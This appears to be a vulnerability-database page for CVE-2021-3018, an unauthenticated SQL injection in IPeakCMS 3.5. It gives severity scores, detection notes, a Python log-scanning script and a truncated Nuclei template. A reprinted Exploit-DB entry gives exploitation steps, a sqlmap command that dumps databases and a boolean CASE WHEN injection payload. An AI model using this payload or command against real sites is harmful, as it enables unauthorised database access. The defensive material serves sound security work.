CVE-2021-3018
Published 2021-01-05
CVE-2021-3018: ipeak Infosystems ibexwebCMS (aka IPeakCMS) 3.5 is vulnerable to an unauthenticated Boolean-based SQL injection via the id parameter on the /cms/print.php page.
Priority P179 · critical · 9.8 (CVSS 3.1)
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 19.51% (97.0th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ipeak | ipeakcms | — | — |
Detection & IOCs
- Fingerprint vulnerable IPeakCMS 3.5 instances by checking the login page at /cms/ for the string 'webCMS-3.5' in the body.
- Confirm exploitation of the time-based BENCHMARK payload by checking for a response duration >= 8 seconds alongside HTTP 200 and the string 'onLoad="print();"' in the body.
- FOFA query to discover exposed IPeakCMS 3.5 instances on the internet.
- Detect exploitation attempts by monitoring GET requests to /cms/print.php containing SQL injection keywords such as BENCHMARK, CASE WHEN, or SELECT in the 'id' parameter.
- Exploitation requires a valid numeric 'id' value that returns a page; attackers must first enumerate a valid ID (e.g., id=1) before injecting payloads.
- The Nuclei template is marked as unverified (verified: false), so detection logic should be validated in a controlled environment before production deployment.
- The time-based detection probe uses a 30-second timeout; network latency may cause false positives or false negatives when using duration-based detection.
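The request-monitoring check above can be run over web server access logs. The following is an added example, not code from the Nuclei template or any source indexed on this page: it assumes combined-format access logs, the names `inspect_line` and `scan` are hypothetical, and the sample entries are constructed. Because a legitimate `id` is numeric, it also reports any non-numeric value even when none of the listed keywords appear.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Request portion of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Keywords named in the detection notes; CASE/WHEN may be split by space or comment.
KEYWORDS = {
    "BENCHMARK": re.compile(r"\bBENCHMARK\s*\(", re.I),
    "CASE WHEN": re.compile(r"\bCASE(?:\s|/\*.*?\*/)+WHEN\b", re.I),
    "SELECT": re.compile(r"\bSELECT\b", re.I),
}

def inspect_line(line):
    """Return a finding for a suspicious GET /cms/print.php request, else None."""
    m = REQUEST_RE.match(line)
    if not m or m["method"] != "GET":
        return None
    url = urlsplit(m["target"])
    if url.path.lower() != "/cms/print.php":
        return None
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name != "id":
            continue
        # parse_qsl decoded once; decode again so double-encoded values are seen.
        decoded = unquote_plus(value)
        hits = [k for k, rx in KEYWORDS.items() if rx.search(decoded)]
        if hits or not (decoded.isascii() and decoded.isdigit()):
            return {"ip": m["ip"], "status": int(m["status"]),
                    "id": decoded, "keywords": hits}
    return None

def scan(lines):
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample entries (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Jan/2021:10:00:01 +0000] "GET /cms/print.php?id=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [06/Jan/2021:10:00:05 +0000] "GET /cms/print.php?id='
    '(SELECT%20(CASE%20WHEN(3104=3104)%20THEN%201%20ELSE%20(SELECT%208458)%20END)) HTTP/1.1" 200 5120',
    '198.51.100.7 - - [06/Jan/2021:10:00:09 +0000] "GET /cms/print.php?id=1%20and%20benchmark(1,1) HTTP/1.1" 200 5120',
    '192.0.2.10 - - [06/Jan/2021:10:00:12 +0000] "GET /cms/index.php?id=SELECT HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit only shows that a request matched; correlate it with the response status and duration checks listed above before treating it as confirmed exploitation.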
CVSS provenance
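| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | — | 9.8 | CRITICAL | — |
| vendor_redhat | — | 5.5 | MEDIUM | — |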
GHSA
GHSA-ww76-wxv4-qwxc: ipeak Infosystems ibexwebCMS (aka IPeakCMS) 3
ghsa_unreviewed·2022-05-24
CVE-2021-3018 [CRITICAL] CWE-89 GHSA-ww76-wxv4-qwxc: ipeak Infosystems ibexwebCMS (aka IPeakCMS) 3
VulnCheck
ipeak ipeakcms Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2021·CVSS 9.8
CVE-2021-3018 [CRITICAL] ipeak ipeakcms Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Affected: ipeak ipeakcms
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.cisa.gov/sites/default/files/2024-07/aa24-207a-dprk-cyber-group-conducts-global-espionage-campaign.pdf
No detection rules found.
Exploit-DB
IPeakCMS 3.5 - Boolean-based blind SQLi
exploitdb·2021-01-06·CVSS 9.8
CVE-2021-3018 [CRITICAL] IPeakCMS 3.5 - Boolean-based blind SQLi
---
# Exploit Title: IPeakCMS 3.5 - Boolean-based blind SQLi
# Date: 07.12.2020
# Exploit Author: MoeAlbarbari
# Vendor Homepage: https://ipeak.ch/
# Software Link: N/A
# Version: 3.5
# Tested on: BackBox Linux
# CVE : CVE-2021-3018
Check the CMS version: go to www.site.com/cms/ and you will notice that in the login box there is the CMS name and its version
Check if it's vulnerable: go to site.com/cms/print.php; if print.php exists, then try to find any valid ID which returns a page to print, e.g. site.com/cms/print.php?id=1
Parameter: id (GET based)
Use SQLmap if you've found the valid id...
e.g: sqlmap -u "site.com/cms/print.php?id=1" --dbs
Payload : id=(SELECT (CASE WHEN(3104=3104) THEN 1 ELSE (SELECT 8458) END))
Nuclei
IPeakCMS 3.5 - SQL Injection
nuclei·CVSS 9.8
CVE-2021-3018 [CRITICAL] IPeakCMS 3.5 - SQL Injection
ipeak Infosystems ibexwebCMS 3.5 contains an unauthenticated Boolean-based SQL injection caused by unsanitized 'id' parameter in /cms/print.php, letting attackers execute arbitrary SQL commands, exploit requires no authentication.
Template:
```yaml
id: CVE-2021-3018
info:
  name: IPeakCMS 3.5 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    ipeak Infosystems ibexwebCMS 3.5 contains an unauthenticated Boolean-based SQL injection caused by unsanitized 'id' parameter in /cms/print.php, letting attackers execute arbitrary SQL commands, exploit requires no authentication.
  reference:
    - https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-ipeak-cms-sqli.md
    - https://m4dm0e.github.io/2020/12/07/ipeak-cms-sqli.html
    - https://nvd.nis
```
No writeups or analysis indexed.
- http://packetstormsecurity.com/files/160815/IPeakCMS-3.5-SQL-Injection.html
- https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-ipeak-cms-sqli.md
- https://ipeak.ch
- https://m4dm0e.github.io/2020/12/07/ipeak-cms-sqli.html
- https://www.amario.ch/cms/